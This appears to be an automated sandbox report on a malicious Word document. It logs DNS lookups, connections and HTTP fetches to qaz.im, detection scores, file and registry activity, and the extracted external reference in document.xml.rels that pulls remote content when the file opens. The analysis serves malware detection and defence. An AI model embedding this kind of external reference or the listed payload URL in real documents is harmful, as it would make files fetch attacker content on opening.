Source: global traffic	DNS query: name: qaz.im
Source: global traffic	DNS query: name: qaz.im
Source: global traffic	DNS query: name: qaz.im
Source: global traffic	DNS query: name: qaz.im
Source: global traffic	DNS query: name: qaz.im

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: qaz.imConnection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
Source: global traffic	HTTP traffic detected: GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: qaz.imConnection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
Source: global traffic	HTTP traffic detected: GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qaz.imConnection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
Source: global traffic	HTTP traffic detected: GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qaz.imConnection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: THEFIRST-ASRU THEFIRST-ASRU

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49175 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49184 version: TLS 1.0

Source: unknown	Network traffic detected: HTTP traffic on port 49185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49187 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49189
Source: unknown	Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49188
Source: unknown	Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49187
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49186
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49185
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49184
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown	Network traffic detected: HTTP traffic on port 49189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49182
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49180
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown	Network traffic detected: HTTP traffic on port 49186 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown	Network traffic detected: HTTP traffic on port 49180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown	Network traffic detected: HTTP traffic on port 49182 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49190 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 49188 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49192
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49191
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49190
Source: unknown	Network traffic detected: HTTP traffic on port 49175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49179 -> 443

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{636165D4-957F-4FF6-8584-BFA7FFC416EB}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: qaz.im

Source: global traffic	HTTP traffic detected: GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: qaz.imConnection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
Source: global traffic	HTTP traffic detected: GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: qaz.imConnection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
Source: global traffic	HTTP traffic detected: GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qaz.imConnection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
Source: global traffic	HTTP traffic detected: GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qaz.imConnection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4

Source: unknown

HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49171 version: TLS 1.2

Yara signature match

Source: document.xml.rels, type: SAMPLE

Source: nnxPt0Yydv.doc	ReversingLabs: Detection: 50%
Source: nnxPt0Yydv.doc	Virustotal: Detection: 48%

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: nnxPt0Yydv.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\nnxPt0Yydv.doc

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$xPt0Yydv.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR7020.tmp

Jump to behavior

Source: classification engine

Classification label: mal68.expl.evad.winDOC@1/17@9/1

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: nnxPt0Yydv.doc

Initial sample: OLE zip file path = word/media/image1.jpg

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Persistence and Installation Behavior

Contains an external reference to another file

Source: document.xml.rels

Extracted files from sample: mhtml:https://qaz.im/load/diy5ah/b6d42680-56fd-4f98-ae0e-ff81e3799df6!x-usc:https://qaz.im/load/diy5ah/b6d42680-56fd-4f98-ae0e-ff81e3799df6

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
